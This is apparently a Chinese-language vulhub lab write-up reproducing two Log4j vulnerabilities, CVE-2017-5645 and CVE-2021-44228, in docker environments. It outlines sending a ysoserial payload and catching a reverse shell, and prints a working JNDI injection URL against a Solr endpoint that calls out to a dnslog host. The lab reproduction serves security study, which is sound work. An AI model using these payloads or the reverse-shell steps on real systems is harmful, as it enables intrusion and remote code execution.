目录
CVE-2021-44228(Log4j 2远程代码执行漏洞)
log4j简介
Apache Log4j 是一个用于Java的日志记录库,其支持启动远程日志服务器。
工具链接
- vulhub 官网链接: https://vulhub.org
- shell生成 网站链接: https://forum.ywhack.com/shell.php
- ysoserial 工具链接: https://github.com/frohoff/ysoserial/releases
漏洞复现
CVE-2017-5645(Log4j反序列化漏洞)
环境搭建
- 攻击机IP 121.36.20.179
- 服务器IP 171.20.10.5
漏洞原理
Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞,攻击者可利用该漏洞执行任意代码。
影响版本
Log4j < 2.8.2
漏洞复现
1.切换到CVE-07-5645目录下,然后运行`docker-compose up -d`,命令,然后运行`docker-compose ps`命令可以看到4712端口打开,环境搭建成功 。
2.利用在线网站生成经过base64加密过的shell命令
3.然后利用ysoserial工具,将流量发送给服务器4712端口。
4.侦听我们攻击机的4445端口,等待反弹shell,可以看到成功反弹shell
CVE-2021-44228(Log4j 2远程代码执行漏洞)
环境搭建
- 服务器IP 121.36.20.179
漏洞原理
在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志的情况下,通过传入类似${jndi:ldap://xxx.dns.com/com mond}的lookup用于进行JNDI注入,执行任意代码。
影响版本
- 2.0<=log4j 2<=2.14.1
漏洞复现
1.切换到CVE-2021-44228目录,然后运行`docker-compose up -d`,命令,然后访问服务器8983端口,可以看到环境搭建成功
2.然后访问指定路径`http://121.36.20.179:8983/solr/admin/cores?action=${jndi:ldap://${sys :java.version}.ekbkqh.dnsl og.cn}`注:标红地方为dnslog当中生成的子域名,当域名有解析记录时,则存在此漏洞。
